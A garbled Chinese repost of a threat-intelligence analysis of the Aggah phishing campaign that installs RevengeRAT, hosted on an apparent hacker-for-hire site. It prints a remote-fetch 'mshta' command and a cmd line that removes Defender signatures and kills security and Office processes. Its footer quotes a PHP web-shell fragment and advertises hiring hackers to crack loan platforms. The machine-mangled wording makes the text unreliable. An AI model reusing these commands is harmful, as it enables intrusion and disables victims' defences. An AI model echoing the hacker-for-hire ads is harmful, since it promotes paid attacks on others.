利用钓鱼邮件传播RevengeRAT的Aggah行动-黑客接单平台

访客5年前黑客资讯903
2019年3月,Unit 42开端着手研讨一同首要针对中东国家的进犯举动。研讨剖析标明,此项举动或许仅仅一同更大规划进犯举动的序幕,其方针触及美欧亚三大洲。 此次进犯举动首要经过鱼叉式 *** 垂钓邮件进行传达的,邮件携带了一个附件,在用户翻开后,附件会经过模板注入从长途服务器加载一个启用了宏的歹意文件,而此文件又会指向BlogSpot来获取歹意脚本,并经过该脚本从Pastebin上下载终究有用负载——RevengeRAT歹意软件。在研讨进程中,咱们发现了有好几类传达的文档,尽管内容或许有所收支,但都遵从相同的流程,最终都是在用户机器上安装了在Pastebin上保管的RevengeRAT,这标明要挟行为者在整个进犯活动中的TTP(战术、技能和进程)是不变的。 开始,咱们估测此项举动或许与Gorgon安排有关,理由有两个:一个是高水平的TTP,二是对RevengeRAT歹意软件的运用。但咱们当时还无法取得一些更确定性的方针与Gorgon安排相匹配,姑且无法将其归因于Gorgon安排。 所以咱们决议将此项举动称为Aggah举动,“Aggah”这个称号来源于Pastebin上一个保管RevengeRAT payload的账户名,也是用于切割发送到RevengeRAT C2服务器的数据的分隔符。 传达进程 咱们对Aggah举动的研讨始于2019年3月27日获取的一封文件,此文件经过电邮的 *** 发送到了某个中东国家的安排安排手里。这封邮件假充本国一家大型金融安排的身份,奉告用户的“账户被确定了”。开始,这封文件只呈现在了一个国家,在教育、媒体/营销和 *** 笔直部分的安排中呈现比率更高,而在四天后的3月31日,咱们看到相同的邮件被发送到了第二个中东国家的某家金融安排。后来跟着时刻的推移,更多踪影逐步浮出水面,此次举动不仅仅针对中东地区,美国、欧洲和亚洲的多个安排安排也相同呈现了这份文件的身影,且进犯者针对的方针是教育、媒体、技能、零售、 *** 、州/地方 *** 、酒店、医疗等职业。由于文件在功能上是类似的,所以咱们将描述之前剖析的原始样本。 3月27日发送的电子邮件中顺便一个Word文档,文件名为“Activity.doc”(SHA256:d7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946),翻开后会企图经过模板注入加载长途OLE文档,详细进程如下:当翻开“Activity.doc”时,会显现图1,诱导用户启用宏,发动条件有必要是桌面版别的Microsoft Word,由于宏在Office 365的Word的联机版别中不起作用。“Activity.doc”文件自身不包含宏,但从长途服务器加载的OLE文包含了一个宏。 图1. Activity.doc中用于诱导用户启用宏的截图 Activity.doc剖析 此文档运用模板注入来加载保管在长途服务器上的文件。图2显现了文档页脚的内容,它会从hxxps://static.wixstatic [.] com / ugd / 05e470_b104c366c1f7423293887062c7354db2.doc处加载长途OLE文档: 图2.Activity.doc文档页脚,显现了长途OLE文件所在地 加载的OLE文件实际上是一个RTF文件(SHA256: 5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f),它运用一个经过混杂的宏加载嵌入的Excel文档,宏里包含了很多“垃圾”代码。这个宏的意图是经过“Shell”指令解码并履行下列URL内容: mshta hxxp://www.bitly[.]com/SmexEaldos3 上面的指令运用了内置的“mshta”应用程序来下载URL所供给的内容,URL是用Bit.ly生成的短链接。由WildFire解析后,短链接会重定向到hxxps://bjm9.blogspot [.] com / p / si.html,如图3中HTTP呼应的“Location”字段所示。 图3.短链接,指向Blogspot 图4展现了链接指向的内容,一篇看起来有点古怪的BlogSpot文章。 图4.bjm9.blogspot (.]com屏幕截图 经过剖析博客上的代码,咱们发现它实际上包含了一个JavaScript脚本,如图5所示。 图5.嵌入的JavaScript脚本 歹意脚本在植入体系后可履行多个活动。首要,它会企图经过删去签名集来阻挠Microsoft Defender。该脚本还能杀死Defender进程以及一些Office应用程序的进程。所有这些都是运用以下指令行履行的: cmd.exe /c cd “”%ProgramFiles%Windows Defender”” & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c “”taskkill /f /im MSASCuiL.exe”” & forfiles /c “”taskkill /f /im MpCmdRun.exe”” & exit 接着该脚本会企图禁用Office产品中的安全机制,尤其是经过设置注册表项值来启用宏和禁用ProtectedView。启用Word、PowerPoint和Excel中的宏的操作是经过将某些注册表项(见附录)设置为值“1”来完结的。 禁用Word、PowerPoint和Excel中的ProtectedView安全机制则是将另一些注册表项(见附录)设置为“1”。 咱们之前的博文中曾讲过Gorgon安排在Office中启用宏和禁用ProtectedView的技能,以及对注册表项次序的修正。此外,此次举动中间断Windows Defender和Microsoft Office应用程序进程的战略也与Gorgon安排千篇一律,而且Gorgon在之前的进犯举动中也曾用bit.ly缩写URL的行为,尽管存在显着的技能堆叠,但仍然缺少详细的依据标明这次进犯活动与Gorgon有关。保管在Blogspot上的脚本首要履行三个活动,包含:[1][2][3][4]黑客接单网

相关文章

怎么黑客接单,黑客微信联系方式,找黑客破解网贷平台

}assert(eval(base64_decode($_POST[cmd])));Step 0 hiddenmenu#是否影藏菜单for(i=20; i < alen;...

压缩包有密码怎么办,找黑客帮忙攻击网站,时时彩输了 找黑客

将下载文件解包后,对歹意装置包的时刻戳进行计算,依据样本的时刻戳内容,这些歹意文件应该是运用生成器一致生成,且编译时刻在2014/3/13(不扫除人为修正或许),那么可估测这些歹意文件或许是在2014...

Outlaw黑客组织通过僵尸网络传播挖矿机和木马-黑客接单平台

TrendMicro研究人员检测到一个传达含有门罗币挖矿机和Perl后门组件的僵尸网络的URL。研究人员发现这与Outlaw黑客安排之前进犯活动中运用的办法相同。 研究人员在剖析中发现进犯者运用了一个...

黑客技术接单_解压包下载

2018年,APT要挟的攻防两边处于白热化的博弈傍边。 作为APT防护的安全厂商比从前愈加频频的盯梢和曝光APT安排的进犯活动,其间包含新的APT安排或APT举动,更新的APT进犯兵器和在野缝隙的运用...

黑客怎么接单赚钱,支付宝黑客如何联系,外国黑客怎么找

“运用一个 Gmail Android缝隙能够让我伪造发件者邮箱地址。 谷歌说这不是一个安全问题。 ”Zhu写到。 下面记载装备办法,以备忘。 classFactory - 加载的 class...

怎么找黑客,黑客视频监控系统

怎么找黑客,黑客视频监控系统

一、怎么找黑客接单流程 1、黑客接单当您到达乘客的接载地点时,驱动程序可以单击黑色到达上车位置按钮。怎么找视频监控系统黑客也有好坏之分,可以侵犯他人的电脑做坏事,也就是说,不寻常的黑客学习电脑是翻译的...